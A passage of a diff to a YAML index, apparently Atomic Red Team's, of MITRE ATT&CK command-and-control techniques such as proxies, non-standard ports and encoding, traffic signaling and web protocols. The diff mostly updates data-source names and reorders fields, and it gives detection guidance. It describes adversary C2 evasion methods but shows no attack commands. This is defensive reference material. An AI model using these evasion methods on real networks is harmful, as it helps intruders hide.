https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1105: technique: @@ -59995,13 +63387,10 @@ command-and-control: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - Process command-line parameters - - File monitoring - - Packet capture - - Process use of network - - Netflow/Enclave netflow - - Network protocol analysis - - Process monitoring + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + - 'File: File Creation' x_mitre_version: '2.0' identifier: T1105 atomic_tests: @@ -60370,21 +63759,6 @@ command-and-control: name: command_prompt T1090.001: technique: - created: '2020-03-14T23:08:20.244Z' - modified: '2020-03-15T00:46:26.598Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 - description: |- - Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. - - By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. - name: Internal Proxy - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1090.001 @@ -60397,24 +63771,37 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Process use of network - - Process monitoring - - Network protocol analysis - - Netflow/Enclave netflow - - Packet capture + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Internal Proxy + description: |- + Adversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment. + + By using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems. + id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + modified: '2020-03-15T00:46:26.598Z' + created: '2020-03-14T23:08:20.244Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: 'Analyze network data for uncommon data flows between clients that should not or often do not communicate with one another. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1090.001 atomic_tests: - name: Connection Proxy @@ -60541,10 +63928,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -60586,11 +63970,8 @@ command-and-control: - macOS - Windows x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -60627,11 +64008,8 @@ command-and-control: x_mitre_is_subtechnique: false x_mitre_version: '1.0' x_mitre_data_sources: - - Netflow/Enclave netflow - - Network device logs - - Network protocol analysis - - Packet capture - - Process use of network + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' x_mitre_detection: Host data that can relate unknown or suspicious process activity using a network connection is important to supplement any existing indicators of compromise based on malware command and control signatures and infrastructure. @@ -60675,9 +64053,9 @@ command-and-control: In context of network devices, monitor traffic for encrypted communications from the Internet that is addressed to border routers. Compare this traffic with the configuration to determine whether it matches with any configured site-to-site Virtual Private Network (VPN) connections the device was intended to have. Monitor traffic for encrypted communications originating from potentially breached routers that is addressed to other routers within the organization. Compare the source and destination with the configuration of the device to determine if these channels are an authorized Virtual Private Network (VPN) connections or other encrypted modes of communication. Monitor ICMP traffic from the Internet that is addressed to border routers and is encrypted. Few if any legitimate use cases exist for sending encrypted data to a network device via ICMP. x_mitre_data_sources: - - Packet capture - - Network protocol analysis - - Netflow/Enclave netflow + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -60723,12 +64101,6 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) Correlating alerts between multiple communication channels can further help identify command-and-control behavior.' - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - - Process use of network - - Malware reverse engineering - - Process monitoring x_mitre_version: '1.0' atomic_tests: [] T1095: @@ -60777,12 +64149,8 @@ command-and-control: x_mitre_contributors: - Ryan Becwar x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network intrusion detection system - - Network protocol analysis - - Packet capture - - Process use of network + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: "Analyze network traffic for ICMP messages or other protocols that contain abnormal data or are not normally seen within or exiting the network.(Citation: Cisco Blog Legacy Device Attacks)\n\nAnalyze network data @@ -60887,6 +64255,25 @@ command-and-control: name: powershell T1132.002: technique: + created: '2020-03-14T23:39:50.117Z' + modified: '2020-03-14T23:39:50.117Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc + description: 'Adversaries may encode data with a non-standard data encoding + system to make the content of command and control traffic more difficult to + detect. Command and control (C2) information can be encoded using a non-standard + data encoding system that diverges from existing protocol specifications. + Non-standard data encoding schemes may be based on or related to standard + data encoding schemes, such as a modified Base64 encoding for the message + body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: + Wikipedia Character Encoding) ' + name: Non-Standard Encoding + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1132.002 @@ -60903,47 +64290,42 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Non-Standard Encoding - description: 'Adversaries may encode data with a non-standard data encoding - system to make the content of command and control traffic more difficult to - detect. Command and control (C2) information can be encoded using a non-standard - data encoding system that diverges from existing protocol specifications. - Non-standard data encoding schemes may be based on or related to standard - data encoding schemes, such as a modified Base64 encoding for the message - body of an HTTP request.(Citation: Wikipedia Binary-to-text Encoding) (Citation: - Wikipedia Character Encoding) ' - id: attack-pattern--d467bc38-284b-4a00-96ac-125f447799fc - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-14T23:39:50.117Z' - created: '2020-03-14T23:39:50.117Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_permissions_required: + - User + x_mitre_is_subtechnique: true + x_mitre_version: '1.0' atomic_tests: [] T1571: technique: + created: '2020-03-14T18:18:32.443Z' + modified: '2020-03-26T22:02:25.221Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18 + description: 'Adversaries may communicate using a protocol and port paring that + are typically not associated. For example, HTTPS over port 8088(Citation: + Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April + 2018) as opposed to the traditional port 443. Adversaries may make changes + to the standard port used by a protocol to bypass filtering or muddle analysis/parsing + of network data.' + name: Non-Standard Port + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1571 @@ -60961,40 +64343,22 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Non-Standard Port - description: 'Adversaries may communicate using a protocol and port paring that - are typically not associated. For example, HTTPS over port 8088(Citation: - Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April - 2018) as opposed to the traditional port 443. Adversaries may make changes - to the standard port used by a protocol to bypass filtering or muddle analysis/parsing - of network data.' - id: attack-pattern--b18eae87-b469-4e14-b454-b171b416bc18 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-26T22:02:25.221Z' - created: '2020-03-14T18:18:32.443Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: false + x_mitre_platforms: + - Linux + - macOS + - Windows + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_detection: 'Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.(Citation: University of Birmingham C2)' - x_mitre_data_sources: - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture - x_mitre_platforms: - - Linux - - macOS - - Windows + x_mitre_is_subtechnique: false + x_mitre_version: '1.0' identifier: T1571 atomic_tests: - name: Testing usage of uncommonly used port with PowerShell @@ -61077,11 +64441,9 @@ command-and-control: for uncommon data flows. User behavior monitoring may help to detect abnormal patterns of activity.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Host network interface - - Netflow/Enclave netflow - - Network protocol analysis - - Packet capture - - SSL/TLS inspection + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Connection Creation' x_mitre_platforms: - Linux - macOS @@ -61125,8 +64487,8 @@ command-and-control: x_mitre_detection: Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. x_mitre_data_sources: - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' x_mitre_platforms: - Linux - macOS @@ -61171,10 +64533,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - Windows @@ -61242,11 +64601,9 @@ command-and-control: adversaries could leverage to conceal data.(Citation: University of Birmingham C2)" x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -61254,8 +64611,19 @@ command-and-control: atomic_tests: [] T1090: technique: - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created: '2017-05-31T21:31:08.479Z' + modified: '2020-10-21T17:54:28.531Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Proxy + description: |- + Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. + + Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. external_references: - source_name: mitre-attack external_id: T1090 @@ -61268,40 +64636,27 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - description: |- - Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. - - Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic. - name: Proxy - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - id: attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T17:54:28.531Z' - created: '2017-05-31T21:31:08.479Z' - x_mitre_version: '3.1' - x_mitre_contributors: - - Brian Prange - - Heather Linn - - Walker Johnson - x_mitre_data_sources: - - SSL/TLS inspection - - Process use of network - - Process monitoring - - Netflow/Enclave netflow - - Packet capture - x_mitre_detection: |- - Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) - - Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + x_mitre_is_subtechnique: false x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_is_subtechnique: false + x_mitre_detection: |- + Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2) + + Consider monitoring for traffic to known anonymity networks (such as [Tor](https://attack.mitre.org/software/S0183)). + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Brian Prange + - Heather Linn + - Walker Johnson + x_mitre_version: '3.1' atomic_tests: [] T1219: technique: @@ -61353,10 +64708,10 @@ command-and-control: [Domain Fronting](https://attack.mitre.org/techniques/T1090/004) may be used in conjunction to avoid defenses. Adversaries will likely need to deploy and/or install these remote tools to compromised systems. It may be possible to detect or prevent the installation of these tools with host-based solutions. x_mitre_data_sources: - - Network intrusion detection system - - Network protocol analysis - - Process use of network - - Process monitoring + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Content' x_mitre_contributors: - Matt Kelly, @breakersall x_mitre_version: '2.0' @@ -61470,10 +64825,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -61539,10 +64891,7 @@ command-and-control: that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)' x_mitre_data_sources: - - Packet capture - - Process use of network - - Process monitoring - - Network protocol analysis + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - macOS @@ -61581,12 +64930,7 @@ command-and-control: In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2) x_mitre_data_sources: - - SSL/TLS inspection - - Process monitoring - - Process use of network - - Malware reverse engineering - - Netflow/Enclave netflow - - Packet capture + - 'Network Traffic: Network Traffic Content' x_mitre_platforms: - Linux - Windows @@ -61594,18 +64938,18 @@ command-and-control: atomic_tests: [] T1205: technique: - revoked: false - id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Traffic Signaling - description: |- - Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. - - Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). - - The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. - - On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + created: '2018-04-18T17:59:24.739Z' + modified: '2021-02-17T14:23:49.495Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1205 @@ -61626,41 +64970,75 @@ command-and-control: url: https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954 description: Omar Santos. (2020, October 19). Attackers Continue to Target Legacy Devices. Retrieved October 20, 2020. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-10-21T15:30:44.964Z' - created: '2018-04-18T17:59:24.739Z' - x_mitre_contributors: - - Josh Day, Gigamon - x_mitre_data_sources: - - Packet capture - - Netflow/Enclave netflow - x_mitre_permissions_required: - - User + - source_name: Bleeping Computer - Ryuk WoL + url: https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/ + description: Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan + To Encrypt Offline Devices. Retrieved February 11, 2021. + - source_name: AMD Magic Packet + url: https://www.amd.com/system/files/TechDocs/20213.pdf + description: AMD. (1995, November 1). Magic Packet Technical White Paper. + Retrieved February 17, 2021. + - source_name: GitLab WakeOnLAN + url: https://gitlab.com/wireshark/wireshark/-/wikis/WakeOnLAN + description: Perry, David. (2020, August 11). WakeOnLAN (WOL). Retrieved February + 17, 2021. + description: |- + Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software. + + Adversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s). + + The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. + + On network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities.(Citation: Cisco Synful Knock Evolution) (Citation: FireEye - Synful Knock) (Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture. + + Adversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL) (Citation: AMD Magic Packet) + name: Traffic Signaling + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--451a9977-d255-43c9-b431-66de80130c8c + revoked: false + x_mitre_is_subtechnique: false + x_mitre_version: '2.2' + x_mitre_defense_bypassed: + - Defensive network service scanning + x_mitre_detection: |- + Record network packets sent to and from the system, looking for extraneous packets that do not belong to established flows. + + The Wake-on-LAN magic packet consists of 6 bytes of FF followed by sixteen repetitions of the target system's IEEE address. Seeing this string anywhere in a packet's payload may be indicative of a Wake-on-LAN attempt.(Citation: GitLab WakeOnLAN) + x_mitre_network_requirements: true x_mitre_platforms: - Linux - macOS - Windows - Network - x_mitre_network_requirements: true - x_mitre_detection: Record network packets sent to and from the system, looking - for extraneous packets that do not belong to established flows. - x_mitre_defense_bypassed: - - Defensive network service scanning - x_mitre_version: '2.1' - x_mitre_is_subtechnique: false + x_mitre_permissions_required: + - User + x_mitre_data_sources: + - 'Network Traffic: Network Connection Creation' + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_contributors: + - Josh Day, Gigamon atomic_tests: [] T1071.001: technique: - id: attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161 + created: '2020-03-15T16:13:46.151Z' + modified: '2020-03-26T20:15:35.821Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: command-and-control + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1071.001 + url: https://attack.mitre.org/techniques/T1071/001 + - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf + description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command + & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. + source_name: University of Birmingham C2 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Protocols description: "Adversaries may communicate using application layer protocols associated with web traffic to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results @@ -61670,34 +65048,9 @@ command-and-control: in which data can be concealed. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. " - name: Web Protocols - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1071.001 - url: https://attack.mitre.org/techniques/T1071/001 - - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf - description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command - & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. - source_name: University of Birmingham C2 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - modified: '2020-03-26T20:15:35.821Z' - created: '2020-03-15T16:13:46.151Z' - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_data_sources: - - Network protocol analysis - - Process monitoring - - Process use of network - - Netflow/Enclave netflow - - Packet capture + id: attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161 + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true x_mitre_detection: "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have @@ -61706,8 +65059,13 @@ command-and-control: syntax, structure, or any other variable adversaries could leverage to conceal data.(Citation: University of Birmingham C2)\n\nMonitor for web traffic to/from known-bad or suspicious domains. " - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' + x_mitre_data_sources: + - 'Network Traffic: Network Traffic Flow' + - 'Network Traffic: Network Traffic Content' + x_mitre_platforms: + - Linux + - macOS + - Windows identifier: T1071.001 atomic_tests: - name: Malicious User Agents - Powershell @@ -61788,19 +65146,8 @@ command-and-control: name: sh T1102: technique: - created: '2017-05-31T21:31:13.915Z' - modified: '2020-03-26T23:26:10.297Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: command-and-control - type: attack-pattern - id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Web Service - description: |- - Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. - - Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed). + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 external_references: - source_name: mitre-attack external_id: T1102 @@ -61809,14 +65156,27 @@ command-and-control: description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016. source_name: University of Birmingham C2 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - x_mitre_platforms: - - Linux - - macOS - - Windows - x_mitre_permissions_required: - - User + description: |- + Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and 